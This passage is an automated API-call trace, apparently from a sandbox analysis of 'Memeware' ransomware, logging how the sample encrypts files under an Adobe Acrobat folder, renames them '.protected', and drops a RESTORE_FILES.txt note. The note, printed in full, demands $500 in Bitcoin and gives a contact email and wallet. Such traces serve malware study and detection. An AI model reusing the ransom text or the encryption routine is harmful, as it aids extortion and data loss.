returned 1 [0086.995] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.995] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0086.995] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0086.995] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0") returned 69 [0086.995] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0086.995] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0086.995] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*") returned 71 [0086.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\.") returned 71 [0087.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.010] FindNextFileW (in: hFindFile=0x47ba90, 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\..") returned 72 [0087.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.010] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.010] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Windows") returned -1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Program Files") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="Program Files (x86)") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="$Recycle.bin") returned 1 [0087.010] lstrcmpiW (lpString1="rdrmessage.zip", lpString2="System Volume Information") returned -1 [0087.010] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.010] StrStrIW (lpFirst="rdrmessage.zip", lpSrch=".protected") returned 0x0 [0087.010] lstrcmpW (lpString1="rdrmessage.zip", lpString2="RESTORE_FILES.txt") returned -1 [0087.010] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.010] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".txt") returned 0x0 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".rar") returned 0x0 [0087.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned 84 [0087.012] StrStrW (lpFirst="rdrmessage.zip", lpSrch=".zip") returned=".zip" [0087.012] lstrlenW (lpString=".zip") returned 4 [0087.012] lstrlenW (lpString=".zip") returned 4 [0087.012] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, 
lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.047] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.047] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0087.048] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ff, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx 
(in: hFile=0x150, liDistanceToMove=0xfffffa01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ff, lpOverlapped=0x0) returned 1 [0087.048] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.048] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.048] CloseHandle (hObject=0x150) returned 1 [0087.049] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.protected") returned 94 [0087.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.protected")) returned 1 [0087.050] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="Windows") returned -1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", 
lpString2="Program Files") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="Program Files (x86)") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="$Recycle.bin") returned 1 [0087.050] lstrcmpiW (lpString1="ReaderMessages", lpString2="System Volume Information") returned -1 [0087.050] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.050] StrStrIW (lpFirst="ReaderMessages", lpSrch=".protected") returned 0x0 [0087.050] lstrcmpW (lpString1="ReaderMessages", lpString2="RESTORE_FILES.txt") returned -1 [0087.050] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.050] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW (lpFirst="ReaderMessages", lpSrch=".txt") returned 0x0 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW (lpFirst="ReaderMessages", lpSrch=".rar") returned 0x0 [0087.051] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned 84 [0087.051] StrStrW 
(lpFirst="ReaderMessages", lpSrch=".zip") returned 0x0 [0087.051] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2000, lpOverlapped=0x0) returned 1 [0087.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.061] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2000, lpOverlapped=0x0) returned 1 [0087.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.061] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.062] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.062] CloseHandle (hObject=0x150) returned 1 [0087.062] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.protected") returned 94 [0087.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\readermessages.protected")) returned 1 [0087.063] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Windows") returned -1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Program Files") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="Program Files (x86)") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="$Recycle.bin") returned 1 [0087.063] lstrcmpiW (lpString1="Search", lpString2="System Volume Information") returned -1 [0087.063] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search") returned 76 [0087.063] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0087.063] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0087.063] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*") returned 78 [0087.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0087.064] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.064] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.064] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\.") returned 78 [0087.064] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0087.064] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.064] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.064] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\..") returned 79 [0087.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.064] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0087.064] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0087.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\RESTORE_FILES.txt") returned 94 [0087.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.066] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.066] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0087.066] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.067] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0087.067] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.067] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0087.067] CloseHandle (hObject=0x150) returned 1 [0087.067] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0087.067] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0087.067] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt") returned 87 [0087.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0087.068] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.068] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, 
lpOverlapped=0x0) returned 1 [0087.069] lstrlenA (lpString="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") returned 684 [0087.069] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.069] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.069] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0087.069] CloseHandle (hObject=0x14c) returned 1 [0087.070] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0087.070] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0087.070] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RESTORE_FILES.txt") returned 82 [0087.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0087.071] lstrlenA (lpString="! 
